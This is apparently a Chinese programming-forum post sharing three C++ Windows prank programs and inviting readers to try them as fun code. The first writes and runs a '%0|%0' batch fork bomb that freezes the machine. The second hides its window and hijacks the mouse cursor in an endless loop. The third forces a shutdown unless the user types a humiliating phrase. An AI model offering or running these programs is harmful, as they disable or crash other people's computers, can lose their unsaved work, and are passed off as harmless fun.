0
已解决
邓涵睿
中级天翼
中级天翼
#include <Windows.h>
#include <iostream>
#include <fstream>
using namespace std;
int main(){
char a[9] = "abc.bat";
ofstream file_out(a);
file_out<<"%0|%0";
file_out.close();
system( a );
return 0;
}
特别好玩的代码,大家试试。
小明今天牵谁呢?
邓涵睿在2020-07-18 13:29:40追加了内容
还有哦
#include <bits/stdc++.h>
#include <windows.h>
using namespace std;
void HideWindow() {
HWND hwnd;
hwnd=FindWindow("ConsoleWindowClass",NULL);
if(hwnd) ShowWindow(hwnd,SW_HIDE);
return;
}
int main() {
HideWindow();
for(;;)
{
SetCursorPos(rand()%2000,rand()%2000);
}
return 0;
}
邓涵睿在2020-07-18 13:33:59追加了内容
#include <bits/stdc++.h>
using namespace std;
int main() {
system("shutdown -s -c 给你30秒时间输入我是猪,否则关机");
for(;;)
{
string a;
cin>>a;
if(a=="我是猪")
{
system("shutdown -a");
break;
}
}
return 0;
}
还有这个
0
0
0
0
0
0
0
0
0
0